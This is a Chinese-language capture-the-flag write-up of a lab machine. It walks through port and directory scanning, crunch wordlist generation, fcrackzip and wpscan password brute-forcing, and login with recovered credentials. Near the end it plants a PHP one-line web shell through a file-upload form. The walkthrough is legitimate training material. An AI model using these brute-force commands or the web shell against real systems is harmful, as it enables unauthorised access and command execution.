一、主机发现

arp-scan -l

靶机ip为192.168.55.154

二、端口扫描、目录枚举、漏洞扫描、指纹识别

2.1端口扫描

nmap --min-rate 10000 -p- 192.168.55.154

发现开放了特殊端口8008，开启了http服务

UDP端口扫描

nmap -sU --min-rate 10000 -p- 192.168.55.154

靶机没有开放UDP端口

2.2目录枚举

dirb http://192.168.55.154

扫出来了很多目录，但是有很多目录是死的，所以需要验活

dirb http://192.168.55.154 > 
            5.txt
          
cat 
            5.txt
           | grep 200

这样就拿到了目录的信息

2.3漏洞扫描

nmap --script=vuln -p22,80,8008 192.168.55.154

无明显漏洞

2.4指纹识别

nmap 192.168.55.154 -sV -sC -O --version-all

三、进入靶机网站寻找信息

flag1

访问靶机网页寻找信息

尝试访问枚举出来的目录拿信息

找到了新信息

继续访问

前三张都是图片，最后一张是flag

这样我们成功找到了第一个flag

flag2

继续找其它信息，没有找到，看来只能从网页源代码找信息了

查看网页源码

翻译后如下

<!--来自 Nick 的评论：备份副本在 Big Tom 的主文件夹中-->
<!--来自理查德的评论：您也能给我访问权限吗？大汤姆是唯一一个有密码的人-->
<!--Nick 的评论：是的，是的，我的处理器一次只能处理一个命令>
<!--理查德的评论：拜托，我会好好地问-->
<!--Nick 的评论：如果你告诉 Tom 停止在公司博客中存储重要信息，我将为你设置管理员权限>
<!--Richard 的评论：成交。博客又在哪里了?-->
" 
             target="_blank" 
             style="color: #576b95; text-decoration: none;">
            

                

                    
                
          
<!--理查德的评论：啊！我怎么会忘记呢？谢谢-->

访问该视频链接

那我们需要变换Prehistoric Forest来获得新的信息，经过尝试url如下

http://192.168.55.154/prehistoricforest/

成功找到了博客页面

在博客中找到了flag2

访问url拿下flag2

flag3

接下来继续寻找其它信息，不然这个博客不能登陆进去

点击博客的第一篇文章，发现了提示

打开后是一张图片，跟youtube上的视频是同一个人

下载这张图片，看看图片里面有没有其它信息

wget http://192.168.55.154/richard/
            shockedrichard.jpg
          

查看图片内容发现了一个md5值

尝试进行解密

解密结果为spanky

正好第二篇文章需要密码才能查看，输入spanky看看

ok了，可以查看第二篇文章了

第二篇文章总结如下

只有 Big Tom 拥有登录系统的密码
有一个名为 
            callahanbak.bak
           的备份，需要重命名为 
            index.html
          
有一个ftp服务，大多数扫描器扫不到，每15分钟上线一次
nick重置了它的账号为，nickburns

稍等一会重新扫描端口，即可找到开放的ftp端口

使用nickburns登陆ftp端口

ftp 192.168.55.154 65534
账号密码均为nickburns

成功登陆，里面有一个
readme.txt文件

翻译后的大概意思是服务器中放了一个子文件夹，还有一个文件NickIzL33t
encrypted.zip


还说了需要使用手机进行访问

说明我们需要使用hackbar改UA头进行访问

修改后的UA头如下

Mozilla/5.0 (iPhone; CPU iPhone OS............8.0 main%
            2F1.0
           baiduboxapp/13.40.0.10 (Baidu; P2 15.5) NABar/1.0 themeUA=Theme/default

这个页面告诉我们有一个隐藏的html文件，我们需要进行爆破找到该文件

使用dirbuster工具进行爆破

直接在终端输入dirbuster即可打开该工具

首先修改UA头

然后配置字典跟爆破路径

成功爆破出html页面

成功拿到flag3

flag4

还有一个压缩文件以及密码提示：

现在我们来构造密码字典

搜索了一下上映时间是1995年

crunch 13 13 -t bev,%%@@^1995 -o 
            pass.txt
          
-t : template的缩写，表示使用模板（模式）来生成密码。
, 表示包含任意一个大写字母（A-Z）
% 表示包含任意一个数字（0-9）
^ 表示特殊字符
@ 表示任意的小写字母（a-z）

生成了
pass.txt文件，接下来我们需要爆破解压密码

fcrackzip -v -D -u -p 
            pass.txt
           
            t0msp4ssw0rdz.zip
          

爆破出来的密码为bevH00tr$1995

成功解压该文件

结果这三个ssh跟网页都登陆不了

尝试将密码字典用tom进行筛选，然后再爆破网页的登陆界面

cat 
            rockyou.txt|
           grep tom > 
            tom_rockyou.txt
          

接着使用wpscan进行爆破密码

wpscan --url http://192.168.55.154/prehistoricforest -e u -P 
            tom_rockyou.txt
          

成功爆破出来了一组账号密码

tom
tomtom1

找到了解压后的第三个密码遗漏的数字为1938!!

使用ssh进行连接

ssh [email protected]
密码为：fatguyinalittlecoat1938!!

成功拿到shell

找到了flag4

flag5

给出提示，说flag5在
5.txt中

结合刚刚的信息，我们现在要做的就是将备份文件改为html文件，恢复Callahan Auto的网站

cp 
            callahanbak.bak
           /var/www/html/
            index.html
          

在根目录下找到了.
5.txt文件，需要www-data用户权限才可以

需要我们在网页中拿到shell，就可以拿下flag5了

在/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS目录下找到了文件上传点

找到文件上传点

随后我们可以写入一句话木马

echo"<?php system($_GET[pass]);?>" > 
            cmd.php
          

然后访问网页即可

http://192.168.55.154:8008/NickIzL33t/P4TCH_4D4MS/uploads/
            1.php?pass=cat
           /.
            5.txt
          

成功拿到flag5：Buttcrack

标志 6

随后我们将5个flag组合到一起即可打开
LOOT.ZIP文件

B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack

成功拿到了6个flag